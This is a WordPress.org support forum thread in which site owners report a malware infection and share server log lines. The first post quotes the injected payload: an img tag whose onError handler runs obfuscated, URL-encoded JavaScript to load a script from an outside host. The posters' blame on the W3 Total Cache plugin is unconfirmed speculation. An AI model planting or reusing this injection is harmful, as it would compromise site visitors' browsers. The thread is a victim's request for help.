WordPress.org

Ready to get started?Download WordPress

Forums

Malware - Code Malicious on WordPress (10 posts)

  1. Davex83
    Member
    Posted 3 years ago #

    Yesterday my website has been attacked at code Malware:

    <img src="about:blank" onError='astro=unescape("%27");astru=
    unescape("%22");sksa=eval("document.getElementById("+astro+"
    seaid"+astro+").src=unescape("+astro+"%68%74%74%70%3A%2F%2F"
    +astro+")+document.getElementById("+astro+"niinnii"+astro+")
    .id+unescape("+astro+"%2E%69%6E%2F"+astro+")+"+astro+"gb"+as
    tro+"+unescape("+astro+"%2E%70%68%70"+astro+")");document.ge
    tElementById("seaid").src=sksa' style="width:300;height:300;
    border:0px;">

    The version of wordpress that I was using is: 3.0 and the plugin activate are:

    Akismet
    Author Advertising
    Featured Content Gallery
    Google XML Sitemaps
    IntenseDebate
    My Category Order
    Permalink Redirect
    Platinum SEO Pack
    Sociable
    W3 Total Cache
    Wordpress Related Post
    WP-PostViews
    WP No Category Base

    I think that because this problem is the plugin W3 Total Cache, in fact the version I used was not updated yet. Now i have update to last versione W3 Total Cache and WordPress to last version 3.0.1.
    At the moment it seems that this code is no longer infected, but my hoster warned me that even after updating the plugin there were some infected files still.

    Does anyone have this type of attack?
    the malicious code is present in the end pages wordpress.

    Now i have deactivate the plugin w3 total cache.
    Thank You.

  2. mercadder
    Member
    Posted 3 years ago #

    I had same problem in one of my sites. I will deactivate the W3 Total Cache now.

    Please keep inform it...

    Thanks!

  3. mercadder
    Member
    Posted 3 years ago #

    The Bluehost error log say this:

    We do not authorize the use of this system to transport unsolicited, , referer: http://www.dealinginabstracts.com/2009/08/09/landscape-in-crayon/

    and

    RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.

    etc

  4. Davex83
    Member
    Posted 3 years ago #

    I wait instructions from somebody who knows and knows how to solve the problem.
    thank you

  5. mercadder
    Member
    Posted 3 years ago #

    I have this message in the log:

    .....http://docommunications.com/test/?p=3416&cpage=2.....

    This page is done in thesis theme, as some of mines.

  6. mercadder
    Member
    Posted 3 years ago #

    Now this:

    [Fri Nov 26 12:52:48 2010] [warn] RSA server certificate CommonName (CN) `www.ymcagc.org' does NOT match server name!?
    [Fri Nov 26 12:52:48 2010] [warn] RSA server certificate CommonName (CN) `www.oringsusa.com' does NOT match server name!?
    [Fri Nov 26 12:52:48 2010] [warn] RSA server certificate CommonName (CN) `www.jamessmithseries.net' does NOT match server name!?

    [List moderated as per the Forum Rules.]

  7. esmi
    Forum Moderator
    Posted 3 years ago #

  8. mercadder
    Member
    Posted 3 years ago #

    I´ve wrote a ticket to Bluehost, and they said everything is perfect.

    :-)

  9. mercadder
    Member
    Posted 3 years ago #

    Thank you esmi!

  10. Frederick Townes
    Member
    Posted 3 years ago #

    Can someone please explain to me what W3TC has to do with this issue? :)

Topic Closed

This topic has been closed to new replies.

About this Topic